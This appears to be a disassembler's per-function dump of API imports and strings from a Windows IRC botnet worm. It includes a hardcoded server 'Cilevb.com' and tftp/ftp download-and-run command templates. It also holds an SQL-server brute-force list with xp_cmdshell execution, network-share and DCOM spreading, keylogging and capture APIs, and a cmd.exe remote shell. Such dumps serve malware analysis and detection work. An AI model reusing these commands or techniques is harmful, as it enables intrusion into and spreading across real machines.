sub_outside():
KERNEL32.GetTickCount
KERNEL32.GetLocalTime
KERNEL32.Sleep
WS2_32.socket
WS2_32.gethostbyname
WS2_32.inet_addr
WS2_32.ntohs
WS2_32.connect
WS2_32.send
WS2_32.shutdown
WS2_32.closesocket
KERNEL32.FindFirstFileA
KERNEL32.FindNextFileA
KERNEL32.CreateThread
NTDLL.RtlGetLastWin32Error
KERNEL32.CreateFileA
KERNEL32.CloseHandle
KERNEL32.SetFilePointer
KERNEL32.ReadFile
KERNEL32.ExitProcess
KERNEL32.GetLocaleInfoA
KERNEL32.GetVersionExA
KERNEL32.GetVersion
KERNEL32.LCMapStringW
KERNEL32.MultiByteToWideChar
KERNEL32.WideCharToMultiByte
KERNEL32.GetStringTypeW
KERNEL32.CompareStringW
KERNEL32.CompareStringA
|
sub_41DF59(0126):
KERNEL32.SetUnhandledExceptionFilter
|
sub_40C328(019e):
"%sKB"
"failed"
|
sub_40A9B2(04c3):
KERNEL32.GetTickCount
"%dd %dh %dm"
|
sub_41456B(04fb):
KERNEL32.CreateThread
KERNEL32.Sleep
KERNEL32.CloseHandle
|
sub_40283D(0675):
WS2_32.inet_addr
WS2_32.ntohs
WS2_32.socket
WS2_32.connect
WS2_32.recv
WS2_32.send
KERNEL32.Sleep
WS2_32.closesocket
"Cilevb.com"
"vb."
"vb"
"19759"
"echo open %s %d >> eq&echo user %s %s >"...
|
sub_405409(09ff):
WS2_32.WSAStartup
WS2_32.socket
WS2_32.setsockopt
WS2_32.ioctlsocket
WS2_32.ntohs
WS2_32.bind
WS2_32.listen
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.accept
WS2_32.send
WS2_32.recv
WS2_32.closesocket
"220 fuckFtpd 0wns j0\n"
"%s %s"
"USER"
"331 Password required\n"
"PASS"
"230 User logged in.\n"
"SYST"
"215 fuckFtpd\n"
"REST"
"350 Restarting.\n"
"257 \"/\" is current directory.\n"
"TYPE"
"A"
"200 Type set to A.\n"
"TYPE"
"I"
"200 Type set to I.\n"
"PASV"
"425 Passive not supported on this serve"...
"LIST"
"226 Transfer complete\n"
"PORT"
"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
"%x%x\n"
"%s.%s.%s.%s"
"200 PORT command successful.\n"
"RETR"
"150 Opening BINARY mode data connection"...
"226 Transfer complete.\n"
"425 Can't open data connection.\n"
"QUIT"
"221 Goodbye happy r00ting.\n"
|
sub_413090(0b6c):
NTDLL.RtlGetLastWin32Error
"The following Windows services are regi"...
" Unknown"
" Paused"
" Pausing"
" Continuing"
" Running"
" Stoping"
" Starting"
" Stopped"
"%s: %s (%s)"
|
sub_41E6EE(0e35):
KERNEL32.LoadLibraryA
"user32.dll"
"MessageBoxA"
"GetActiveWindow"
"GetLastActivePopup"
|
sub_4036EB(10b8):
KERNEL32.Sleep
"Cilevb.com"
"tftp -i %s get %s\r\n"
"echo open %s %d > o&echo user 1 1 >> o "...
|
sub_414063(10cf):
KERNEL32.CloseHandle
|
sub_40C682(13ac):
KERNEL32.GetTickCount
"ids443vbc"
|
sub_413DD4(19f3):
KERNEL32.CloseHandle
"SeDebugPrivilege"
" %s (%d)"
"SeDebugPrivilege"
|
sub_412D4E(1c2e):
KERNEL32.Sleep
"NOTICE"
"PRIVMSG"
"%s"
|
sub_405B23(1dd5):
"GET "
" "
"\r\n"
|
sub_412F12(1ed1):
"The specified service name is invalid."
"The requested control code is undefined"...
"The handle is invalid."
"The handle does not have the required a"...
"The service binary file could not be fo"...
"The service cannot be stopped because o"...
"The database is locked."
"A thread could not be created for the s"...
"The process for the service was started"...
"The requested control code is not valid"...
"An instance of the service is already r"...
"The system is shutting down."
"An unknown error occurred: <%ld>"
|
sub_407652(22a3):
"%d.%d.%d.%d"
|
sub_417849(23e5):
KERNEL32.ExitProcess
|
sub_40AD85(23e7):
"[NETINFO]: [Type]: %s (%s). [IP Address"...
|
sub_401000(2e8c):
KERNEL32.GetTickCount
|
sub_41C63E(2f2e):
KERNEL32.UnhandledExceptionFilter
|
sub_40B459(3339):
"rb"
|
sub_41E162(35b5):
KERNEL32.WideCharToMultiByte
"TZ"
|
sub_41E84C(3673):
NTDLL.RtlGetLastWin32Error
|
sub_4133C2(3fe3):
"Share name: Resource: "...
"Yes"
"No"
"%-14S %-24S %-6u %-4s"
|
sub_403178(40e5):
"Cilevb.com"
"FXNBFXFXNBFXFXFXFX"
|
sub_41A016(502f):
"e+000"
|
sub_418A83(55e5):
KERNEL32.HeapCreate
KERNEL32.HeapDestroy
|
sub_409E15(592f):
KERNEL32.CreateFileA
"%sdel.bat"
"@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
|
sub_418B28(597c):
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap
|
sub_415E3D(5c3f):
NTDLL.RtlFreeHeap
|
sub_40484C(5f99):
"GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
|
sub_41BB7F(6091):
KERNEL32.SetFilePointer
NTDLL.RtlGetLastWin32Error
|
sub_402988(60ad):
WS2_32.ntohs
WS2_32.send
WS2_32.recv
KERNEL32.Sleep
|
sub_41E777(60b5):
NTDLL.RtlAllocateHeap
|
sub_41F004(6338):
"1#SNAN"
"1#IND"
"1#INF"
"1#QNAN"
|
sub_406A32(63c7):
KERNEL32.CreateFileA
KERNEL32.SetFilePointer
KERNEL32.ReadFile
KERNEL32.CloseHandle
|
sub_41920D(64eb):
KERNEL32.VirtualAlloc
|
sub_41D18F(66df):
KERNEL32.WideCharToMultiByte
|
sub_419EEF(6804):
"KERNEL32"
|
sub_41AC48(6954):
NTDLL.RtlSizeHeap
|
sub_4088A0(6ca1):
KERNEL32.FindFirstFileA
KERNEL32.FindNextFileA
"%s\\*"
"%s\\%s"
" Found: %s\\%s"
|
sub_40446E(6e81):
WS2_32.select
WS2_32.__WSAFDIsSet
|
sub_416AD4(702c):
KERNEL32.GetLocalTime
|
sub_414392(71f8):
KERNEL32.GetTickCount
"mIRC"
|
sub_40A5B9(7918):
KERNEL32.CloseHandle
|
sub_404F08(7c83):
KERNEL32.Sleep
"sa"
"root"
"admin"
"administrator"
"mysql"
"sql"
"vb"
"Cilevb.com"
"DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
"EXEC master..xp_cmdshell 'del eq&echo o"...
"EXEC master..xp_cmdshell '%s'"
|
sub_409F9D(7d7d):
KERNEL32.CreateFileA
"@echo off\r\nEcho REGEDIT4>%temp%\\1.reg\r\n"...
"c:\\ab3.bat"
|
sub_414128(7e76):
KERNEL32.GetTickCount
|
sub_41FDB0(822d):
"string too long"
|
sub_41FFDC(822d):
"invalid string position"
|
sub_402FDD(840c):
KERNEL32.MultiByteToWideChar
"\\IPC$"
"\\\\"
|
sub_4185CB(84ec):
KERNEL32.CloseHandle
NTDLL.RtlGetLastWin32Error
|
sub_415223(8732):
"%s: %s stopped. (%d thread(s) stopped.)"...
"%s: No %s thread found."
|
sub_413629(893c):
"Account: %S"
"Full Name: %S"
"User Comment: %S"
"Comment: %S"
"Unknown"
"Administrator"
"User"
"Guest"
"Privilege Level: %s"
"Auth Flags: %d"
"Home Directory: %S"
"Parameters: %S"
"Password Age: %d"
"Bad Password Count: %d"
"Number of Logins: %d"
"Last Logon: %d"
"Last Logoff: %d"
"Logon Server: %S"
"Country Code: %d"
"User's Language: %d"
"Max. Storage: %d"
|
sub_416368(8af0):
NTDLL.RtlUnwind
|
sub_41328C(8cdb):
KERNEL32.WideCharToMultiByte
|
sub_40778B(8ce3):
KERNEL32.GetTickCount
NTDLL.RtlEnterCriticalSection
NTDLL.RtlLeaveCriticalSection
KERNEL32.Sleep
NTDLL.RtlDeleteCriticalSection
KERNEL32.InitializeCriticalSectionAndSpinCount
KERNEL32.CreateThread
NTDLL.RtlGetLastWin32Error
"dcom135"
|
sub_409C92(8e50):
KERNEL32.GlobalLock
KERNEL32.GlobalUnlock
|
sub_4030C0(90cb):
KERNEL32.MultiByteToWideChar
KERNEL32.Sleep
"\\IPC$"
"\\\\"
|
sub_417709(91cb):
KERNEL32.GetFileAttributesA
NTDLL.RtlGetLastWin32Error
|
sub_4179F9(95ea):
KERNEL32.MultiByteToWideChar
NTDLL.RtlGetLastWin32Error
|
sub_405A0C(9713):
WS2_32.WSAStartup
WS2_32.socket
WS2_32.inet_addr
WS2_32.ntohs
WS2_32.connect
WS2_32.closesocket
WS2_32.WSACleanup
|
sub_413D69(9991):
KERNEL32.CloseHandle
|
sub_4149E0(99a1):
"Software\\Microsoft\\OLE"
"EnableDCOM"
"SYSTEM\\CurrentControlSet\\Control\\Lsa"
"restrictanonymous"
"%c$"
"%c:\\"
|
sub_41DFCD(9a80):
KERNEL32.MultiByteToWideChar
|
sub_413B77(9bb4):
"Invalid parameter."
"Server name not found."
"This network request is not supported."
"Not enough memory."
"The name is invalid."
"Duplicate share name."
"Invalid for redirected resource."
"Device or directory does not exist."
"Level parameter is invalid."
"A general failure occurred in the netwo"...
"The operation is allowed only on the pr"...
"The user account already exists."
"The group already exists."
"The password is shorter than required ("...
"An unknown error occurred."
"The computer name is invalid."
"Share not found."
"The user name could not be found."
"Network connection not found."
|
sub_409DF3(9dbe):
"SeShutdownPrivilege"
|
sub_40460C(a2f7):
WS2_32.send
|
sub_407135(a6b1):
" %s: %d,"
" Total: %d in %s."
|
sub_40AA1B(a7c4):
KERNEL32.Sleep
|
sub_4139F7(a909):
"Username accounts for local system:"
" %S"
"Total users found: %d."
|
sub_412E70(a9bc):
NTDLL.RtlGetLastWin32Error
|
sub_4140CA(ac14):
KERNEL32.GetTickCount
"Cbb-"
"%s"
|
sub_40967F(ac3c):
"Kernel32.dll failed. <%d>"
"User32.dll failed. <%d>"
"Advapi32.dll failed. <%d>"
"Gdi32.dll failed. <%d>"
"Ws2_32.dll failed. <%d>"
"Wininet.dll failed. <%d>"
"Icmp.dll failed. <%d>"
"Netapi32.dll failed. <%d>"
"Dnsapi.dll failed. <%d>"
"Iphlpapi.dll failed. <%d>"
"Mpr32.dll failed. <%d>"
"Shell32.dll failed. <%d>"
"Odbc32.dll failed. <%d>"
"Avicap32.dll failed. <%d>"
|
sub_420209(aeff):
KERNEL32.RaiseException
|
sub_417C13(af5c):
KERNEL32.ExitProcess
|
sub_41335E(afa1):
KERNEL32.MultiByteToWideChar
|
sub_40C297(b2db):
"RAM"
"Cdrom"
"Network"
"Disk"
"Invalid"
"Unknown"
|
sub_40AAD1(b873):
KERNEL32.GetVersionExA
"95"
"NT"
"98"
"ME"
"2K"
"XP"
"2003"
"couldn't resolve host"
"dd:MMM:yyyy"
"HH:mm:ss"
"[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
|
sub_40CB75(bc9b):
KERNEL32.Sleep
|
sub_407BFE(bf9c):
KERNEL32.CreateThread
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
|
sub_41CF19(c00c):
""
"..."
"Runtime Error!\n\nProgram: "
"\n\n"
"Microsoft Visual C++ Runtime Library"
|
sub_40CCDD(c24e):
KERNEL32.Sleep
"PASS %s\r\n"
|
sub_405A89(c4a5):
WS2_32.send
KERNEL32.Sleep
WS2_32.closesocket
WS2_32.WSACleanup
"rb"
|
sub_41B989(c6bf):
KERNEL32.ReadFile
NTDLL.RtlGetLastWin32Error
|
sub_402DDD(c7bf):
WS2_32.inet_addr
WS2_32.ntohs
WS2_32.socket
WS2_32.connect
WS2_32.send
WS2_32.recv
WS2_32.closesocket
|
sub_40B3AE(c8ef):
"Copic Tilevb"
|
sub_405F7E(c8fd):
"text/html"
"application/octet-stream"
"ddd, dd MMM yyyy"
"HH:mm:ss"
"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
|
sub_406100(cb9d):
KERNEL32.GetFileAttributesA
KERNEL32.CreateFileA
KERNEL32.CloseHandle
KERNEL32.CreateThread
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
"\\%s"
"%s"
"%s%s"
"\n"
"*"
|
sub_4160C4(cba9):
NTDLL.RtlUnwind
|
sub_41915C(cbe8):
NTDLL.RtlReAllocateHeap
NTDLL.RtlAllocateHeap
KERNEL32.VirtualAlloc
NTDLL.RtlFreeHeap
|
sub_4196E9(d2f6):
KERNEL32.RaiseException
|
sub_4174DF(d50c):
NTDLL.RtlAllocateHeap
NTDLL.RtlReAllocateHeap
|
sub_41DF48(d8fa):
KERNEL32.SetUnhandledExceptionFilter
|
sub_41C42A(dbc9):
NTDLL.RtlGetLastWin32Error
|
sub_40C515(dc5b):
"A:\\"
|
sub_4146BC(dcb6):
"Software\\Microsoft\\OLE"
"EnableDCOM"
"SYSTEM\\CurrentControlSet\\Control\\Lsa"
"restrictanonymous"
|
sub_409CCD(dd6a):
KERNEL32.CloseHandle
"mIRC"
|
sub_40A171(e076):
"%d.%d.%d.%d"
|
sub_406B1D(e1a1):
"%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
|
sub_4051BC(e422):
KERNEL32.Sleep
"Cilevb.com"
"echo open %s %d > o&echo user 1 1 >> o "...
|
sub_40A7FD(e48b):
KERNEL32.CreatePipe
KERNEL32.GetCurrentProcess
KERNEL32.CloseHandle
KERNEL32.CreateThread
NTDLL.RtlGetLastWin32Error
"cmd.exe"
|
sub_418ABF(e71f):
NTDLL.RtlAllocateHeap
|
sub_4033CB(eae2):
KERNEL32.CreateFileA
KERNEL32.CloseHandle
KERNEL32.ReadFile
KERNEL32.Sleep
|
sub_4089F2(eb03):
KERNEL32.GetModuleHandleA
NTDLL.RtlGetLastWin32Error
KERNEL32.LoadLibraryA
"kernel32.dll"
"SetErrorMode"
"CreateToolhelp32Snapshot"
"Process32First"
"GetDiskFreeSpaceExA"
"GetLogicalDriveStringsA"
"SearchPathA"
"QueryPerformanceCounter"
"QueryPerformanceFrequency"
"RegisterServiceProcess"
"user32.dll"
"SendMessageA"
"FindWindowA"
"IsWindow"
"GetClipboardData"
"CloseClipboard"
"GetAsyncKeyState"
"GetKeyState"
"GetWindowTextA"
"GetForegroundWindow"
"advapi32.dll"
"RegCreateKeyExA"
"RegSetValueExA"
"RegQueryValueExA"
"RegDeleteValueA"
"RegCloseKey"
"OpenProcessToken"
"LookupPrivilegeValueA"
"AdjustTokenPrivileges"
"OpenSCManagerA"
"OpenServiceA"
"ControlService"
"CloseServiceHandle"
"EnumServicesStatusA"
"IsValidSecurityDescriptor"
"GetUserNameA"
"gdi32.dll"
"CreateDCA"
"CreateDIBSection"
"CreateCompatibleDC"
"GetDIBColorTable"
"SelectObject"
"BitBlt"
"DeleteDC"
"DeleteObject"
"ws2_32.dll"
"WSAStartup"
"WSASocketA"
"WSAAsyncSelect"
"__WSAFDIsSet"
"WSAIoctl"
"WSAGetLastError"
"WSACleanup"
"socket"
"ioctlsocket"
"connect"
"inet_ntoa"
"inet_addr"
"htons"
"htonl"
"ntohs"
"ntohl"
"send"
"sendto"
"recv"
"recvfrom"
"bind"
"select"
"listen"
"accept"
"setsockopt"
"getsockname"
"gethostname"
"getpeername"
"closesocket"
"wininet.dll"
"InternetGetConnectedState"
"InternetGetConnectedStateEx"
"HttpOpenRequestA"
"HttpSendRequestA"
"InternetConnectA"
"InternetOpenUrlA"
"InternetCrackUrlA"
"InternetReadFile"
"InternetCloseHandle"
"Mozilla/4.0 (compatible)"
"icmp.dll"
"IcmpCreateFile"
"IcmpCloseHandle"
"IcmpSendEcho"
"netapi32.dll"
"NetShareAdd"
"NetShareDel"
"NetShareEnum"
"NetScheduleJobAdd"
"NetApiBufferFree"
"NetRemoteTOD"
"NetUserAdd"
"NetUserDel"
"NetUserEnum"
"NetUserGetInfo"
"NetMessageBufferSend"
"dnsapi.dll"
"DnsFlushResolverCache"
"DnsFlushResolverCacheEntry_A"
"iphlpapi.dll"
"DeleteIpNetEntry"
"mpr.dll"
"WNetAddConnection2A"
"WNetAddConnection2W"
"WNetCancelConnection2A"
"WNetCancelConnection2W"
"shell32.dll"
"SHChangeNotify"
"odbc32.dll"
"SQLDriverConnect"
"SQLAllocHandle"
"avicap32.dll"
"capCreateCaptureWindowA"
"capGetDriverDescriptionA"
|
sub_40384C(ec29):
KERNEL32.Sleep
|
sub_41CB20(ed5b):
KERNEL32.GetEnvironmentStringsW
KERNEL32.GetEnvironmentStringsA
KERNEL32.WideCharToMultiByte
KERNEL32.FreeEnvironmentStringsW
|
sub_40B16D(edda):
KERNEL32.GetLocalTime
"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
|
sub_4085D3(ef39):
"%s\\%s"
"r"
"="
"="
|
sub_404108(f1cc):
"BBBB"
"CCCC"
|
sub_41D55A(f395):
KERNEL32.CreateFileA
KERNEL32.CloseHandle
NTDLL.RtlGetLastWin32Error
|
sub_40C443(f5ac):
"failed"
|
sub_415E07(fd6e):
NTDLL.RtlAllocateHeap
|
sub_41F7D7(fe6c):
KERNEL32.WideCharToMultiByte
|